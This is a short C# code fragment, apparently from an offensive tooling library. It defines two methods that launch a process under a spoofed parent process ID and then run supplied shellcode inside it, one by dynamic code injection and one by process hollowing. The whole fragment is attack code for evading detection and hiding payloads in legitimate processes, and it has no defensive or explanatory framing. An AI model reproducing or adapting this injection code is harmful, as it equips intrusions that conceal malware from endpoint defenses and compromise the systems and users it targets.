public static void PPIDDynCodeInject(string binary, byte[] shellcode, int parentpid) { PPIDSpoofing Parent = new PPIDSpoofing(); PROCESS_INFORMATION pinf = Parent.ParentSpoofing(parentpid, binary); DynamicCodeInject(pinf.dwProcessId, shellcode); }
public void PPIDPProcHollow(string binary, byte[] shellcode, int parentpid) { PPIDSpoofing Parent = new PPIDSpoofing(); PROCESS_INFORMATION pinf = Parent.ParentSpoofing(parentpid, binary); ProcessHollowing hollow = new ProcessHollowing(); hollow.CreateSection((uint)shellcode.Length); hollow.FindEntry(pinf.hProcess); hollow.SetLocalSection((uint)shellcode.Length); hollow.CopyShellcode(shellcode); hollow.MapAndStart(pinf); CloseHandle(pinf.hThread); CloseHandle(pinf.hProcess); }